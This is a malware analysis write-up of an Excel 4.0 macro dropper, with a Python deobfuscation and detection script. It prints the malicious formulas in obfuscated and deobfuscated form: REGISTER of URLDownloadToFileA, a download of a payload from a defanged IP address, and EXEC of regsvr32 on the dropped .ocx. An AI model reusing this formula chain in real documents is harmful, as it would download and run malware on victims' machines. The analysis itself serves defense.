Excel 4.0 Macro Malware — an old feature, but it can be harmful

Figure 1 — The “Enable Content” button tempts the victim to run the malicious Excel file
Figure 2 — Unhide option
Figure 3 — Unhide sheets
Figure 4
Figure 5 — The Auto_Open function

First stage

Figure 6 — The REGISTER function
Before:
=REGISTER("uRl"&"Mon","U"&"RL"&"Do"&"wn"&"lo"&"ad"&"To"&"FileA",D20,"Drwrgdfghfhf",,D22,D23)
After:
=REGISTER(uRlMon,URLDownloadToFileA,D20,Drwrgdfghfhf,,D22,D23)
URLMON = which DLL to load.
URLDownloadToFileA = which function to call from the chosen DLL.
D20 = "JJCCBB" (used to specify the data types to call the API).
Drwrgdfghfhf = custom name (the function will be called under this new custom name: "=Drwrgdfghfhf()").
D22 = 1 (Category).
D23 = 9 (Category).

Download

Now we look at the use of the custom-named function “Drwrgdfghfhf”. The adversary uses it to download the malware from a malicious server over HTTP.

Figure 7 — Download a file
=Drwrgdfghfhf(0,"h"&"t"&"tp"&":"&"/"&"/"&Tiposa!E21&Tiposa1!G11&Sheet2!K12,"C"&":\"&"Pr"&"og"&"ra"&"mD"&"a"&"t"&"a\VDscytujyctfjkvu1.ocx",0,0)
Drwrgdfghfhf = custom name defined by the REGISTER function shown in Figure 6.
Tiposa!E21 = "158[.]69[.]133[.]79/".
Tiposa1!G11 = random number between 213214234 (bottom) and 9776980793567560 (top), generated with the RANDBETWEEN() function.
Sheet2!K12 = ".dat".
Figure 8 — RANDBETWEEN function
=Drwrgdfghfhf(0,"http://158[.]69[.]133[.]79/[RandomNumber].dat","C:\ProgramData\VDscytujyctfjkvu1.ocx",0,0)

The execution

The last part of the Excel 4.0 macro is the file execution. The malware uses the EXEC function to run the malicious OCX file.

Figure 9 — EXEC function
Before:
=EXEC(E19&"vr32 C"&":\"&"Pr"&"og"&"ra"&"mD"&"a"&"t"&"a\VDscytujyctfjkvu1.ocx")
E19 = T(E20&E21) = "regs"
E20= "re"
E21= "gs"
--------------------------------------------------------------------
After:
=EXEC("regsvr32 C:\ProgramData\VDscytujyctfjkvu1.ocx")
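As an added example (not the author's code), a small static folder for the obfuscation pattern shown in Figures 6 to 9: it substitutes the referenced cells, collapses the "&" joins and drops T(), then flags REGISTER/EXEC, urlmon and calls to the custom name. The cell values are constructed from the figures above; [RandomNumber] stands in for the RANDBETWEEN() output and the URL is kept defanged.

```python
import re

# Cell values constructed from the write-up above; RANDBETWEEN() output is a placeholder.
CELLS = {
    "D20": "JJCCBB", "D22": "1", "D23": "9",
    "E20": "re", "E21": "gs", "E19": "=T(E20&E21)",
    "Tiposa!E21": "158[.]69[.]133[.]79/", "Tiposa1!G11": "[RandomNumber]",
    "Sheet2!K12": ".dat",
}
# The three obfuscated formulas discussed above, in execution order.
SAMPLE_FORMULAS = [
    '=REGISTER("uRl"&"Mon","U"&"RL"&"Do"&"wn"&"lo"&"ad"&"To"&"FileA",D20,"Drwrgdfghfhf",,D22,D23)',
    r'=Drwrgdfghfhf(0,"h"&"t"&"tp"&":"&"/"&"/"&Tiposa!E21&Tiposa1!G11&Sheet2!K12,"C"&":\"&"Pr"&"og"&"ra"&"mD"&"a"&"t"&"a\VDscytujyctfjkvu1.ocx",0,0)',
    r'=EXEC(E19&"vr32 C"&":\"&"Pr"&"og"&"ra"&"mD"&"a"&"t"&"a\VDscytujyctfjkvu1.ocx")',
]
SUSPICIOUS = ("REGISTER(", "EXEC(", "URLMON", "URLDOWNLOADTOFILE")
# A1-style cell reference, optionally sheet-qualified; the lookahead keeps
# function names such as LOG10( from being mistaken for cells.
REF = re.compile(r"(?<![\w!])((?:\w+!)?[A-Z]{1,3}\d+)(?![\w(])")

def resolve(formula, cells, depth=0):
    """Fold cell references, T() and "a"&"b" joins until the formula is stable."""
    if depth > 8:                           # stop on circular references
        return formula
    def sub(m):
        if m.group(1) not in cells:         # unknown cell: leave the reference
            return m.group(1)
        val = cells[m.group(1)]
        if val.startswith("="):             # the cell itself holds a formula
            val = resolve(val, cells, depth + 1)[1:]
        return val if val.isdigit() else '"' + val.strip('"') + '"'
    expr, prev = formula.lstrip("="), None
    while expr != prev:
        prev = expr
        parts = re.split(r'("[^"]*")', expr)      # odd indices are literals
        expr = "".join(p if i % 2 else REF.sub(sub, p) for i, p in enumerate(parts))
        expr = re.sub(r'\bT\("([^"]*)"\)', r'"\1"', expr)
        expr = re.sub(r'"([^"]*)"&"([^"]*)"', r'"\1\2"', expr)
    return "=" + expr

def analyze(formulas, cells):
    """Flag REGISTER/EXEC, urlmon downloads and calls to REGISTER-defined names."""
    aliases, findings = set(), []
    for f in formulas:
        r = resolve(f, cells)
        hits = [k for k in SUSPICIOUS if k in r.upper()]
        hits += [a for a in aliases if a + "(" in r]
        m = re.match(r'=REGISTER\("[^"]*","[^"]*","[^"]*","([^"]*)"', r)
        aliases.update(m.groups() if m else ())   # remember the custom name
        findings.append((r, hits))
    return findings
```

Running analyze(SAMPLE_FORMULAS, CELLS) yields the three "After" forms above together with the flags that triggered on each.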

Conclusions

The Excel 4.0 macro is an old feature (XLM 4.0 macro) that Microsoft introduced in 1992. This technique is a different way to execute malicious code through an Office document. Beware: not only VBA code can compromise your machine.
